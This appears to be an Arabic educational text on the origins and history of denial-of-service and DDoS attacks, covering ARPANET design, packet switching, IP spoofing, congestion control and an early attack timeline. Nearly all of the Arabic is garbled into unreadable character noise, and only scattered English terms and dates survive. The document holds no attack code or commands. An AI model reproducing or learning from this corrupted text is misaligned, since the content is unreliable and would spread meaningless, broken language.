Ai^UJI £>i& .IgJ Uuujj li^A 4_jj£ <jc !)Liaa <DDoS j DoS ^ *l'VVi>»l j J^ ^u^ujjII CjI ji^JI aJ IRC 'u^l Jc- 
.1980 J (HIV/AIDS) j^VI/ajj^I 4^UJI o*jj*ls jj^ ^Lftll J DDoS uUa j IRC 

Cj j^kJl ? jAjVI/^JjuiJI <cLixJl (J^AJ (JJJ JJ^ U^-^ t ♦ I^LJ '^C- all ^llj ^ (jSj ^aJ ciljl UJUa .(j^Jl (J^^ 3 (JC- djl j,^ a\\ 

_^L3l ^.L^jI ^j^-^ ^xii^xJI CjUjlaui ^ cIjVI^. t 6^31sl!I ^gk ^>j^1 

If'jj^ui jA La .Ajj^mU j^iLa lift .jJjVI/^j^u^I 4^11^1 (j^lj jjjjjjjS j^uail ^j- 4 J J * J ^ LT^ < »'« 1 "** DoS (1)1 Jj^ Jj^^ ^ 

ALilil ^1 MjJaj dJbjj t"jll o^ui AlLuua" l^JI jIju 4JV o^axJl AjUIuiI a^C- j ^^pVI JjIujjj ^llil IaIp Jj£ j- 4 AlLuLoib lJI jjpVI ^ 

IRC ^ j± ^ 'IRC J-^V1 Cj! jjL ^jLuj 4Knm U jUj&U cJ—VI ^ ^ii cjU^a DDoSj DoS ^ « 

4_LaUJ^)3l a£jjoJI ^ jL^ IRC ^ cJ^ J' ^ T A'sW ^a^pJl J IRC dlauLo ^al (J^asu . IRCc^ 1 ^*^' 1 ^ J ^Af^- 

<jU ^> liA ch ^ lS^ <iu*H J! J^ V cillilj " jU3! ^> aJU Ukio" (DeMilitarized Zone) DMZ 

AjjJaill .(Ajcli^ll CjIj^II ls 1c (Jjiillj Jjj^alll <L^al L^l ^-IauJIj tl^isu laSS distil IgJl t^l jl! J) ,4^aJt L-±a^ 4&j1a "J^" 

J CjI^JI j£\ ^jaxJI (j^jj '(worms) jt^lt 2003 ^ J -fj^' c> u^j^ ^DDoS lU^ 

U £±!& ^3!j ;^UJ! 

a ikluJJ jJl Jl! 4-kil3l jjiadllj t jLuUjVI Jc Sj^Sltj tdjlj^llj ^ laLudll J Igjaij ^a J^J! CjIj^I dijjia t4joij dlS jli I^A J 



(Design Principles of The Internet) ^u^j ^ jUa 

J AjUljJ ^ ^ill j ^Advanced Research Project Agency Network) ARPANET > ^jJI c^j j^V JjLJI JaL^ull 
djLauajj-<JI j CjIx-gL^JI J *^ j^. l^-jli ttilli ^j-<i V^j . l_u£^ j cJ^* cJ^ J ^ j^- J jjj^l ^3^'^ ijIS UiAic. I960 ^>^-^ J» 

<j| Jc ^ifljjJaxJl (j^l Jl jj jjj^ll ^xil Jl Jaii ^jl£ .'^IaIxJI djULud^Jl AijstxJl j ojfiJl ^ ji ^j-d aA^LujJ j tA-Uaall 

Ld^aj* jj£I CjULud^Jl oi^ dUaJj^l La£ .Asu (jC Lj£jjai ^llaJjlxi Asu ^\ ^jjijjJaxJl Aia« o ^jl tdjl^JjoJl A^.jJ Vj tLaLaJ (j-dl 

^jiaxJl ^ - ; ^ CjA^jII ^ lj£ c_ia ill CIASliA -laJj ^j) ^jjjUII (ilj^l tc_ la ill ^Jajaul J Ij^ I A J^-J ^-b aJ^J jj jJJ^ll o^-?-^ 

.^Jj Jail <J Ja Jc oAjA^JI (JSLuiaII (J^asu (illi O^J 'U^-^V^ ^ 4-^^ J^- 

Packet-Switched Networks 

J Jj)H o^Vj .{packet-switched network) dij^ * J^ ^ J^V^ J ^LaaVI % jSall 

.(circuit-switched network) ^h^j^^ *^ j^l cIjVj^ J^U. ^ 4 ^^\* -^J^ U jtal jl^j t^laJI J ajj^JI 

AixJl l^ja jl£ J£ J a£jj^13 A-naall ^nJl 4^151 <JaJ ^ j^^ll CjVI^ jll C1jjI£ .c flJxjua j c aKo ^ixu^ill I^A jl£ 

.(J^t» ill ^ > ^axJ ^ CjA^jII Ajjj Jill AiaJ! ^ jj <JL^j! dil jj3 4^151 t4_^pj| 

\ a i o^JJ <j I (j^J V jll CjVIj^J^J ^jl j-all AJa jQ^ a A laJ i u j _ c _ 5 _fliL<J\ Jl <JjujjaJ| ^Jjjlall ^ ^1 tdlVU^VI oifc (J^La. (j-a 

^atlxJlj (Jjoij>J| lil t jUlLj _(jL^ajVI ^l^ijl l& jJjaJ (j^J ^jl J-oll .4-g_a jll j^j^q ^Ijjl (j-a l& JJC- £xa dlLa jJjlaII 

..Jjl jxJl (j-a ^J-^ ;»lAalLudl Jl (_^^JJ L^-jt^ *^J^ Cljlxi^ J (j^lj Ajajla JJC. (J^joiJ t*< 

<Ja£> ^jj La£ 4_ilc^ Axuxj ^-aj^Lxi JL^jVI iaa> .4^3' 11 Jj £*>JJ jJl J ^VL^iVI < J JjSVl 4^*1^1 dul£ 

£_jJa jj-al V <jl£ t£-l2a jaJ Jaa. t*BjA jl£ lij .<K Cj^L^ajVI Jaa. <J j-aJ Jj Cj^I Jails jV I J*^ jt S^l j ftJflC- .4^jm jll L^Ja 

tia.Ha jlajojl istijaj dli circuit-switched networks ^l^f^l J 4-1^ ><JI ^*ll j .^M' i> Jliall j ><Jt o£ ^ 

<a&a JaSS ^jjjJ £>i& . jJ jj;^^ U£ <Jakj Jj <Jakj <jL^j*VI JaJ^)l A 1 ^ L a 4_illc ja. dlli Ja jlaa. ^jc 6jUc dijl£ jllj 

pIjj^VI 4JU J 4ijjj* CjVU^jI jl V Jtilbj ^^31 JJiillj JaLjjVI S^J 4jU11 4_Ja jc a<>u%\\ JSja J*^ o^j <^ 

Jajljjllj ^ixJl ^ 4-^-^j (Jl ^JG^ 3 ' J^ Sl£La-<JI ^H Uiajl <j£Jj 4 JjjuolijJlj Lfla I^A ^j^Uj V JJjSSH .^^jjai^ll ^.luiaJl 

^jja jll ^LojI c>^ circuit-switched networks ^h^j^^ s j^I a<^1 
^ixJI ^ ^jaxJI ^ a<^1\ d^a uj^" j .^-J^f^^ ^L&j^ajj ^ {packet-switched network) ^ 

jjajjj t (circuit-switched networks) ^^j^^ * jWI ^jVj^ 5JLa ^ aJc^ ^l^U jj^i ikjj j*j jiXL j£\ 

^jJjuj^J! .CliVI - ga^Vl L>^ ^•^*3^ (J^J ^Jju^I ^jl ^ ^ > nl SlI ^^)aj t^atlxJlj (Jjuj^JI 4_j^aj^aa^ CjI ^jfl ^ U -0 ■''SJJ^ 

^^lill j ^Igjjj ^aall CjLd jlst-d (jlasuj 6<g_a. jll ^jl ^jc j Lu1Lq]| (JxaJ ^3^" cJ^^ (J-o (J > -ajV^-j ^j^jflJ ^jJbijjauJl j 

^JJ 4_all<Jl ^j^)]a]| JjJaalj (j^-<ui Cj£ j ^JjujI ^ ^JLajjU ^ jll Clljl£ laJ > o jll ^IslSI ^jli diVU^Vl ^jAxJI ^j-<i Ja.l^J j ^3^^ JJ^^ 3 
(JLujjI ^jj Cilia. A laJ > o j ^ac <C jjoij c ajujj^J ^J^a*. (Jj^la q\A tJaUjjVl J' S^Sc- < ; 1 J > n i j3 jla jjc. ^^^^ jLaixJ! u sn\ til ,f>(pg > j 

^^aJjauI] .CjUUJI JAx-o djljjila dili lajljjll Jj^j te^liS JJ^I CliVl^ajVI ^jl ^ ^1 ikl^V .^J^Jl (J^J^^ I^A <fla.iUi (ajaJl 

a laluaJ ikjjuj jll ^ixJl jli tftj^l CjUiJl djli JJ><J1 ^jIsuIojVj tftj^Luollj jll iallijVI CjVAx-g ^ L paSlHH 

djj^Jal ^3 j /ojS jld ^ u *"H ^-g-a. jll ^1 (_^^jJ (^ill jll (^5^- U^>^ ^3^^ '^^Vl ^1 A-ia. jill S^lcj ^aJ (j-a j ^jj jaJill 

^^JaJjoa jll ^ixll ^ 1^. C«y^^ (1^3^^^ *^J^ *^ C3^^ ^^Vl ^1 (J'^f^ ^ U^J U^3^ ^tU^-^ 

\c jxjii I t Vn . iVi 3 aiajuqjI I ^^UxJI (j-i^a. .cjVI^jVI ^Slc ^ 6 jjij g-* (packet-switched network) 2;^^ 

ttilli ^x»j .Ajliil LgJ ^jjj jx»j Ajujjojj <j^ia.j jJl Ai^su c^ill t— ujajVI ^5^1 tdiVlj^jVI <il£j ^jialiaJlj 4jS jj jaIIj (J^^VI 
_^ jaJl lS^-^ A£jjoi aJ a - gaJ Jc 4 > ^a.li SjiaJ U jC^ .ClinaJl tiljLouJl JjS ^jxi aS jaJLu^VI ^ jjuoI <Jj^a. 4_LJajl (^la. Uiajl l^jli 

<c jIIaII ^j^-ll (Jjj^ 3 J Aic LJa-d jj da^juj oj^ill o^A .^SHa^Ij J-uij-^J) 4 a ^jlj-a V 

(bandwidth) c£-^jSll (jUaj (J^ajC ^ 4 a SIjS jjS jj ^ _<alla^ll CjVL^ajVI .JJAxll ^ 

c> s^lilaaVI J^U. c> cjVU^jVI c> ^jaxII ^jo^j {packet-switched links) -Mjj tCjVl^iVI 

t^j| jaII (jLojJa ^1 *la.jJ V ^-jl jA aJ/u all I li^ tft ^"'ll ( . uLallj /6^a.lj AjlS^ L^Ia J£ (>— >>laJ V ^1 laJLudVI ojji ^jl jfljaa 
L>^ J^-^^ ^ ■U J ^ C '^) J ^^ (j^^aJjab<Jl £y± ^jl jaII la.lj ^jl (j^J (_^^ll ^IjAxll DDoS ^ JJ^) -0 ( ; \ <> " -JaJjJalU jA I^Aj 

J ja. j J <C jjjouJI Jj^all ^^>^- ^.laJ djULuia ^aJ^!il lA Ljajj jll 6^1x11 Jc Jjl j^ll 3^-^ J ^^^^ ^J^ ^-^^ ^jojIsj J Cj jaJ! 
A K >*>1 ^ <JaJ V t^jjJC. jjuall ^jjyi^aJjauJl ^Jjj qj! jL<JI ^lAaljujVI ^jUijJal (J^lxll ajujISIH j ^jl jaII Jaia \ a'u) ,^jjjljJa jjfl^'iuifl 

jj^Ij i^J jjij ji jSaj v JUlbj ^Ula SjAii* (Resource reservation protocols) Jaia. CjVj^jjjjj .DDoS 

(jlajC t(JlL<Jl (JjJjuj J^) ^ laJLmd (J^l ^jl jaII ^j-d <l^lc <j^a. ^j-aJj^aaJ ^jl j^ll ^ > J flJ .DDoS JJ^>^ ^^)^ Cf^* 

^^aJjauJl AjjA ^LauU <l£jauJl Cj^cU^aJ tdljjjjVI (jliui J . ((J^a jail 4-abuox j tAjj^j^ll <aJlx-<Jl SAa j Cj3 jj t^^jlll ^jUalll 
(J^LjjII aJI ^ ^c. jll Jc Jjl jaII jl£lal j ^jjj Lo£ djbj^ll ^ ^j^xjl ^JJJ ^a.l^xJl (j^-dJ Clua _JP Spoofing c : 1 J tt1 J 
(J^txi Jl ^jjjc jjuall ^jj^^aJjaiAll Jl <jjudillj (JIslS jaj Jc 4 lilaJ id^aJl (Jjca Aa>l g a11 (j^J t(j£LuLoll d^A (Ja. ^aJ jl (^^^ .AJ^lxll 

,Ia^jI jxi a I lal> alj <Jfll£ll CjVI (jljlkl (j-d J J^- 

(packet-switched network) ? J^j^ c \^ > ^ -(! 5SJ1aJIj Jujj^J) JjjIs ^1 ^ ji^Jl I ^ SS «j aj^JI 

6 j3 ^a. ^ .J^^^^ ^^A 3 ^ c ftJui&J (_^ill C5 £j-<iljj^ll 4-ia jilll diLixi jjl ja. JJjlaJ 

.IgJLujjl ^aJ J jxiJl AjjLuj dijlS ^1 tilt t5 SSlJl Jj Utiawc lajjla ia.b (jl^ ^1 5ia.jll J ^a jaJl j CjVI^jVI 

Loj t^jjja.VI (JjSjLuiaII AilLai j t^jlall Jjuaa XiC SjjujUx jjIjj <iaJjoj j ^ac (Jj^la ^jc jUlaVI AjIqC j ^jjjjlal! jjj*j AjflU ^aJJ 
V <j| L_Ua A-njlaJl jIjV) U^J J^^ cJ^^J Jl jaJl <±a jj <c jjuj lWjujJ I^A . Jlloll j Jjojj>JI tilli J 

, JU3I <j£juoll J <£jjuall c_jal jj U jC^ ttilli >i jlil jllj 4^ jaJl <Jj^I ^jjj <J>»l^ll jLoiaII L_ fljsu 4£jjuoll J 6^a.lj ^jJ 
liLol (JtlaJl I^A ^jJa jJ ,B S^-*juoj L - * D cl)!^ .(-1^ jL^-a ^W*^ J J^-^ <La3^ J J' 

l^jjj^-^ .DDoS >**\ 4j j^j - ^ £^0aA\ £y* j <^ IP spoofing c * q> ^ s-**^ 

.DDoS ^ v^n^l ^ja»JI ^la^ll £C£i Ax-b cjU^j j J£al> ^LKuLftll ^SliS ^ jj <DDoS uL^> 







^ Ssxl\ m (j\l±xA\ ^jAxJI £a Cj jJ^Wll <JjoiJ taAW a Lis* j] jJ^Ia jjJaJJ ^1 CljjljVl ^\ AaJLoal -LaLojl d UJjujJ ,1a JJC- (j-a 
^.Ij (jj^J La S^lc j (dl jJ^JjlH lI^-J^ C5^) Ail^ (jl 6 (J^-^ 4-lajljla (dj jJ^Wti ^ > Ajjuij) CljjljVl (COFC) 

* jjj-oll ^^>^ ^jLujjuiV c3^-^ o^j^ core ^ -Wjj .core ^L ^Jaiij^ jLui>JI 

JSI ^Uajj Jj^a A£^>^ Ja^a ^-LL^J L_fll j^Jl L_J jSI Jaj|j^)3l ;d^j^C a j A alia o j^U^o 

(jLkj Cjli (Jj^j (core) ^^LojVI -1^^^ £y* jj^y^^ '^j^- Cy j& fp^ A-njL^Ji jLiVl .^^jlll ^jUail] (j^ajc 

■ DDoS ^Lj! Cj^j La kbJaL) 

Best-Effort Service Model and End-To-End Paradigm 

^^UJI ^1 ^{Best-Effort Service Model) JjJaa! ^i^oj jA 11a .^La^kil cjULu-b ^1 ^U^jj &l jLaiJI ^j^JI 
I^qaaj ^ ^ala <, jjj-<Ji ^^>^ S^lcj ^^^ic Ja£a j^jiill ^1 4^1^ (routers) ( - ^ ? L " s ^ y ^j^V^ ~j 4_louj^)3I 

s 4 a\\ o^J ^jLiJ3 (J^»> ^>"s"m j laJjuoJ 

jjjj ^31 ^iLaull Jla t j^JaSli d^^xi dj lAkLa i^IUa ji (End-To-End Paradigm) ^U-^^ j K^ M1 J 

t^rj^ >^Ml j LkaJ! ^jc c \ iA^j^A\ c_ilSa s^lcj t(<-aj^ SjLuA ^1 j^-Saii (jl <jL jUjJa ^1) {reliable delivery) 

(Jilll CjV j£ JJj^>J c^^ 3 U^J A£jjuj JjS ^j-a oAxUx-a (JJ^J (jl V t^UjLuJl CjLa^kjlj t jjLuallj t^a^kll CjI Alala J^-J 

c_jc!>Ij3I jJ-lj (IP) ^—^J^V^ J J^J^ .^^J ^-W^ -^^^ A£jjuj cJl JJ V LaliJ ;4_jjjjjJa3l CjLa^Jl jjaiil 4 ; ^aA AjI^-^I ^ ^ixu^all 

<iLjaVL (jj/d ^ ill (j;iiijJaxJI .dijjljVI a£jjoi Ajl^-j ^iijjJaxJI j (router) ^3^' ci^ j tAj.u>L.nVl 

^gjjjaJI CllS jll <Jj£ . L>j > tt < jj^oll (UDP) " ^JLjiaII dLUj LU4. ^ J j£ jJj^)J .^La^Jl ^aa] i oj jJ j>J (TCP) 

s^V 1 JJJ- ^ ^ (RTSP) cs^l ^ jll ^ JjSjjj^ 4 (RTCP) ^ijLJI ^1 ^ fSaJll ^ '(RTP) 

(Jij JlLa C5^^^ L$ J±^<^\ ClA'l djLa^kJl ^-AjUj ^aJJ /ojlnjuill JjLoj^)3 (IC1VIP) ^--^J^V^ L^Lojj ^ A^aall <J j£ jJ j^>Jj 

.jj^jiii .^cj t^jjj^iyi ^^>^^ 6 "Ljjj^ (JjLuj^)3i tdijjijyi ^ cdjiiLJi 

djlcli^ ^ jSj ^jli * - jlti^l ^jjj .^^^jJl -!aJ^)3l aSliA o^J^. L_fljUaj AiUiaV (JjjJ ^^-^^ ^J^-^^ *^LP qj La 

fjA \Ai\£\ ^llall q\ ^3 t Jx-aVl ^ pL^ La£ tAjlgil! Ajlgill u!^ t^J UJ^ -^J^^ DDoS 

^j-a V (jlS A£jjoJI til jLoj A-iLfllaixJl dj| jjisull £y La£ t^Lila j ^1 ^-a 6^a c fll > >i1 ^jl ^irTn V A^JjaJl 
-lajoij J J jsu JJJ^I ~ o jl ^ ^ AjjIL-g lLu\£ ^^jII S,lia. jll CjLd^Jl jl <suji3l £>i& j& ja. jl£ .CjLlg-ill Jc iaSS lA^iiij 

AiLa. Jc (JjJaSl <J^-^ JJJ - *^ ^^P" L>^ ^ A J^V S^-la^a jll CjUj^JI dlxjJaj .4£jjuJ| 

j>* ci±jl£ (cjLo^JI j>* < fljj^jl] (J j]| ( aM U> j] <jL^jjojV1j a£aJill <J>ujjj Jllj) 4_ii<»VI ^-g-<<JI jl Jj 'M-g-^ **-*jji uj^ 

L-jLau^ai jl (jlajjflj 4juji3l m Aj ^L}£Jl ^irTn a£jjuJI J Lnjuj -I^jJ V j ( jj/^ (S ^ UJ^J* 4-9UJI J ^ J?> J*ll ^ JJ jaUi 

;4jlg_i3l J UJ^ ja. j*3l jjiibjJaxJl 
.Ajlgill J J ja. j^a t iUjJa^ J£ j^l jLajJal tdll j^VI J tdlljlg^Jl j idlS jll tilli J LoJ Ojl jj£LoJ 
.<C jjoiJ AjL^JjojVI CjIs-I jal iLajlj i nflJl Jc jLja JaLudil J^juij a UOi ^ Jc jjj^Ui 
. jjja.VI jjiibjJaxJl Jl 4£jjuo3I jSl jlll !.lpgJ ! it aJ jl ^iljlkl *J jll i nflJl jjiiLijJa-all jl Liajl (jlajJflJ Igij 
^^juaflj t . UjudJ 2004 J 2003 J ^JJ^^ a ^ uJ a J 4< j|j£Luil «">lj J^ Jc- a - ^ JJC- Igil CAjJaljliaVI oifc dujJ) Jflj 

jjjUc l^j jj AijjL (router) CjL^jJI Jkxj J u^s 4 Jc tmstream DDoS g^jt .botnetj 

.Slammer sjjJI J*i US 4 j^J! 

cjIa^a ci^jj^al jl lid '(Network Core) »*N ^ DDoS <; \:r ^ u- 0 'j^^ <^ ^ 

^j^aj Ls l^ <iUJI AjiJI cjUI > ^jqti CjIa^a ^ J^UjII oSaj V j t^^HaVI ^pJI ^ sjULujVI ^Saj DDoS 
CjU^JI ^Ja ^Ic^ Cjlc^la^ AiLjaU ^ jSj ^jSI DDoS ^li^ll djLJT .<iUJl JL^jV ^^^j^I Jlkjll c>aj^ c> jjSI ^j'q^l 

L>^ M ^-^^ cl)^ U^J ■'S^ c ' f ^ UAic Aj^IslSI Jj^>^i ^S^)^ djL^aLa ^i^Vl l^A ^ 1 Jj 4_Ldl (JjSj ^jIj 1 

jUiajVI liA Jldl £&Ja £)\ £cjJal jllj CljUlSal<Jl tilt 4_iiti3 ^ jAill L-lllaJJ <^jjLJ! DDoS 

^AilJaxJl <ajjaJ) L— b >n\ j t^iixi aJ ^ > ^il I^iaS l^jia aJ Ajlgi AjIuqVI Ajujill L5 J^jJal j ^jl jSilj A£jJo3I ja. J DDoS ^^-C-^^ 

Aiis^ CjU ^ djblUjVI ^ a^U ^ .^jU^' ^W^^ "Ujj^ ^ v; " <>; DDoS ^li^ll J jla. J j*. CjblSSjVI 

'(end-to-end paradigm) Jj (best-effort service model) J^a> <^ ^^j^ SjjSUI jlSaVI jj^a 

aJjuoflJ j <iaLau3l oi^ J> ,AiLaJl ^ac Jj ^iisu JS c ; laJ m A La-LoiJ AjjojLojVI a£jjoJI oiA JfJ (Jl L-JLaJ ;Ajoiij aJAj^alU l^ixi Lt.nLt.nl J^aJ 
J AicLjaxi b^\j jj 66^J^aJl CjV jS jJ jjJl J Cjl^ulalll (jLa^jj taa^Jl djU^aJ j^ t nj dljjljVI <>— 1« 6L_fll jaJl j jA jaJl ( fljl la jll 

I^A j-a ^jLudll ( . ul a II j jjoJIj ^^^jlill (jUaill ^jiajC. ( J jl jx^JjujU ^jI jj £a Aj^aikjj ^Jj3 4_Sjjajj <Jf5 cJ JJ^*^^ ^S^)^ 

A£jjoi -laJj ALd . ja.VI L_fljia3l L_alj Jc JasUj L— ma Ajl^ill Jj "LA^l j^j J L_fll jJa^l -la.1 jj^J LdAjc L^jJal j ^J>«"iJ jnjtnj aJAj^alll 

.tJLa-xJl JJJaJI -ia JJ^ 1 J (Ja.^jll <UjV <■ la j ^£J^ C-Lujj] 4 laJ t n jll ^ixJl tJaJjoJl 

3J1AJI ri^j t ^ l .(congestion incidents) ^^jVI c-^lj^.j ^ip Spoofing 'DDoS J U k^alb ja 11a 
J cj j^j^^ l .(congestion collapses) ^1*0 jV I jW^^^ c> ^> c^jj^VI 1986 j^j^^ J *j* JjV <a^alj 

(J^La. j-a <C jjudJ <J£jouJI I jl jUj ^3 j -laJjll AjdcSl jl ja>»J Uui JJJ^l ^J^- j-* ^3^^ <JUjLj jj-ajL 4 lal t tUJ I jjl£ ^-j^JI 

4^ jaJl jc Ul^II end-host TCP implementations ^Uj ^ cjUIVI .TCP ^ jl J aiajll cjUII ^ jJij j ^xl^ 
Sjbj jl LajJalj ^il L<i jlcjjoj 4<il3i ^j .cJUjVI <J , ^*- xi j u °^ tJ^^ 3 c-^ ^ W a J aJLujVlj aLa^jVI Jc cJ^^ <iaaLaJI 

Ijjjoiij jl jjill j^.laJLaixJl ^VjA ;^ja.l ftjUau .4_ij|j^c Cjlia^j J ja.j J ^jl ja!3 j^lc jj^ jLajJa I g j£ V "LA^-^I Jj A_a\_^_iSl (jS^j 

t>^ c> ^j^? c5^^ lP 3 ^ J^ o3j^ (congestion control) jVI J ^£aj3! 

djlia^ill j3 jld jlll (jLkill (J^ajC jxi ^j-all ^Aj^aJfl 6 JLojjVI jAx-d Lff^'j^ dlliflJdll aLa^jl j jlHaVI ^^JJ La£ .L-fljj^alll 

/ flj^aall Jc JjJ ^^jll 4_ij|jAxJl 

^aJj^aJj <jSI ja3 <iajuj jl<Jl 4_ia jlill o j^-a.1 j-« o^LoixJl t . lilaJj A_a\_^_iSl Jj AjL^jII ^ j jaj (ill^ijl j!)La. j-d I J^l aKjuLoJI d^A diaic> ^3 

^jialjc-V ^ jJI (router) J SjjuHLoJI -UjuujjII CjUWI j>» jlc jj tilLiA .<U!asl1! jUu-aJ djlia^ill jjj ^^^jill jjUail! (j^ajc 

c^] uj^ ^ .fair scheduling algorithms j active queue management '(congestion) ^U^jVI 4^ 

Jllj .UUi DDoS <aJUJ JjUo 

(Internet Evolution) ^>jVI jjIsj 

(2004 ^-C- J) cJ^^ J-^ij dljjljVI j-« jjiilxiaxJl J^C jl l— Lft .l^jLodj ALq 4 JJt t'Ml j aa^aJl J cJ^W^^ J - ^^ ^—^J^V^ A£jjoi uj 

dljjljVI a£jjoi dlaaj^al 64jujjoj j A t *aJa*j 3JLujj l^o-lL >n jt ^aij .dljjljVI Jc jj jJJ^ jW^ 1 170 L>^ jffi ^LiA jl£ 
B £u j^V) <j-al ^ jjjj J]| LLuali) (jja JjJaJl ^j^j Jl tuajj JjI^JI j-aUt I^A <^Ij 
lijj <4£^l J ^ c u^uJ! c>-64 6 C5J u fl Sl ^ tilU* jl£ < ARPANET t> J jVl f bVl J :(^') Scale - 
23 '1971 ^ J .^^1 oj^Ulaj j^VI ^ jIj jl (>» ajV jl£ *2<^i J] < a] t Sai^ j*->* ^ jl j^Vl jJ 

a*j 4981 ^ J .((router) s j^J\ j^UJI c_i3j3l J ^s^) u jqj > ^ l i> J-^l 15j u A » ^ l t> 

^jSI j TCP WtU^ Ig-^l"^ ^ J^ J 'd^J^^ 64 J JaSa ^ 6 u' j^' J j**- <NCP) ^ j^l 
i^IUa jl£ 4983 ^ J ji^? .CajjjjVI Jc jjijjJaJI t> 213 JaSa '(1975 ^ J j 1974 ^ J <oa^ 

c> j^l (ARPANET iP^ ^ L^d) 1989 ^ J jl^j * 10*000 c> 1987 ^ Jj^ 4*000 c> 
% jb] UUi c> A j^V 1 c> uj^ 170 c> jSl ^ ol£ <2003 J .0*^1 100*000 
.CjV jlii ^j^I aI^joj (jj^ii (jl Jj ^ <^VI .^_Lq (jj^ 170 ^jl^j (Jj^LolaH o^j *^ (j -0 L - ) ^ 

jll ^j-d L_flVl j) CjUaII ,\nVj a! uij j£ (JJ^T^I ^1 (Jl (^5-^ I^A ,A-iL<iVl ^ j^ll <J!L<i ^^Jc a^J V ^jjqj> >>^ll 

(jj^^j QiA^'\yi\A fjt> ^ jA\ dijjjjVl ^^qa^Luox ^ cilliA noil uLjsu ( flU) User profile 

A-ijUiill djliL<Jl cJj^^^J U^J^ Sjlc ^^1^ ttilli ^^^ic 6 j^lc j .^J^ > *a lS^^ <j^aLaJl 6^^. VI (jj-aul *Ldj!>l!l Ai^sLxJl 

jl CijjljVI aJLojjIj <illi '(S^i j^A 3 1 ^iilaj JiLd jiil 4_jj>»ii3l a1 <jj±aJI ^1 j^VI 

L_ij| ja. (j£J j cAjjaali djLauajj-<JI j cjlx^LaJl ^^ic Ijj^ali Asu ^3 djjSjV! ml jJI \{4 \\f Popularity 

jJl ^ lajuljV) ^jxi AjAslSI ^glc JJjJj J^^^ C5^^^ JJ^^^ dujjjVI C-iL<LaA 

(Internet Management) Sjbt 

4_il<il 4_ill ^^xJlxJl jLaajVl (jia^)i3 ^Jjjuj j Aa. jj V 4(_^^)a.l A-iaU £yz a (j\j ^Lgjoj (j^J t*1J^ '^J^- J d^J^V^ 6 C5J^V^ 

^31 cJ*^ CjIaja^jI! daa ^jjj 4 at-ula <jl£ .(Ja. Jj ^llaj ^a.j>JI ^^>^.l 4 K uj a XP spoofing <J j> 

_4jUl13 4_jlia. jjc. <J jlaJl jjj (J^-nj ^^JIslSI jLaajVI lP 3 ^ <J1 aajujl (jli ttilli ^ j .4.^1 j-d 6^1x11 ^j-d Aj^LaVI 

A3 j A^JjaJl JJ^Jl ji^J (jC CjUi jlx-d ^jAflJ J ^jjJC. JJ V 6^lc 4£jjaJ! <>iAa. j^JA (jli 4<JLgcV1 jla-^ j <Jj^ j>n^ 

^jil JJ ^H^J L_jila J£ .CjlaJjuJl (JA AjAxJl JJC CjLfta^Jl ( ■ (JAljA ^1 AajJ V ttilli Jc 6 J^C .CjLAa^Jl ( ■ l^LJ J (jjlxjl! 

tCjlcLoJ XjJaJ (JA JJ^al DDoS AjAxJI (jl L— Ua _ jJJ^jl jJ^kUll 11a ^aAflJ .A£jjai J£ J (jLudjVI (J^ (j-* Aiilill jjia. Ja.Ajj 

.AjjaJI j ^ixulxlll cjLui-ujj-aI! Ljj Jj lJj^j t ARPANET 6^ f AjjL ji\ SjjI j 4986 ^ J cw^ib ^NSFnet 



4-uIa ^^Lua 
DoS and DDoS Evolution 

CjI£jjuo3Ij 4^jjoJI CjVI ^L^jSI ^JjIjL^j <iljl^> JliiaVlj (jj.uiali.ft3l cdjjljVl L sl&j* * ^ j^j UU^.i ; jj* 

LaLaJ Ifrla A3 <j£LuuJl ^j-^ ^J' .(J J <-ajla3lj < djjJjVI dlLaAaJl ^Jl^J a j£j DDoS ^ ^ tAjC>1 L gall jljjuiVl <3jjujj 

jixk (j-d lS^^ uU*^^ CjAcLuj S&j .4jLaa.ll j] J^ll J jl^t t Likjl) aa O^J 6 U*^ C5"^ 

^i^j^jj ^cxil^Jl CjIjj^j jIj>jI U^^^ (Jjxjauli A aiaJlj Cjlkulalll .Ia jLuujl t—flSjj (_£jA*Jl <LaJ^& ^JUlLj ^ ^ all jl^-aJI ^^ic 

4-JjUll jlj^aJI .IgiaJ ojjjSII <jjUj3Ij J j^Jl c> ^ jll < ^ <^Jls^ jjAJI DDoS <&^> 

History of Network-Based Denial of Service 

(jC ^IjJaa t<JjViui^\l <Lu^a3I CIjIaL^jVI (jC 6JJ>^J ^ laau ^jl l^J <laJJ^<Jl CjLa^JI j DDoS J DoS LS J^Jl JJ^ 3 ^^ 

http://staff.washington.edu/dittrich/misc/ddos 

1980 >»ji J- 

^Ui^^U ^ja DARPA c> Vl ^ ^1 ^CERT/CC) CERT Coordination Center ? 

^ djjl jaJl ^Ui^VI j g-. J-U31I s jjiJI <>A CERT/CC .W^ j^VI ^ ^311 '(Morris worm) 

1989 J- 

.ping.c J ^ja^I jjSII ^ _f (flood) JjVl jj^ill 
1990 <> jSj- cjsj ^ J_ 

(j-d tAjtild jl oAjlill |(jVI uJl ^jjjlill c all£jjx Cj^jjj j£i j j-<Jl Aj j-<Jl j Aj^<JI AiLjal ^A-ijL^Jl CjLdAkJl j djLi jlx-<Jl 
jll ^A^JjouJ! <j^aLkj (4 Ilia] (jj^J (jl dAjA^JI qAa 1±J1xjuq1\ j& <Jjaij ^jli tlLLuj LjIj Lo£ (j^J .(jA^AaJLud^ll ^Ac (_^jLaaJ <£jjuoll 

(jli oAA ^1 laJLuji £yz .(J^LuLftSi ^j-d AjAslSI CIijjjujj ^]^J (JC- *L<»AiJl t . La a ^ di^Ja 4 1990 L ^ajla 

L-iLud^Jl AijjaJ lilli ^5^1 J , JJjLill (j-G jA3 > Al (jj^J ^i^. tAjUjjoJ a£jjoi 6 jj jjj^ jl^J> L-jL ^LL^j ^.I^aII 

tlg^lc-l j IaAjA^j cJ^-^^ (j- 0 (j^ DoS <-!^*-*^ ^ JJJ 0 ^^ djLLud^Jl (jj-^l^xJl ^AaOjujJ (j! (j-d Cjlx^LaJ) Ajjuoilal! 

J^l (> ^SjIaj ^ cjLLo^J! .sniffers '"^y^ tjj^^ ls'^ ^"^Ull 
telnet L£ t^Ln^ jj^i dia^a) j thin-wirej flat thick-wire ^j^^ a<^^\ &L*\ jll tSlli ^ ,t*Ui 

.sniffers ^^. u ^ l!^*-^ uj^t^ <s ^ a ^ ^ ^-^j^ CjI^jjoJI tAiaxjJall a£jjoJ! 
1996 i- 

Jaia SYN ^ ^ t> cJ^j^ < "^^ . n ^1 j TCP/IP stack ^ * ^ 4 1996 ^ J 

l^l^kioaV ^nst^ cjli sbVl *>i& di^jj^ai .CERT 3 kml jj l$iL£&l ^5 (li^-V ^jA? ^ 6 SYN flood ^J^*-*^) 

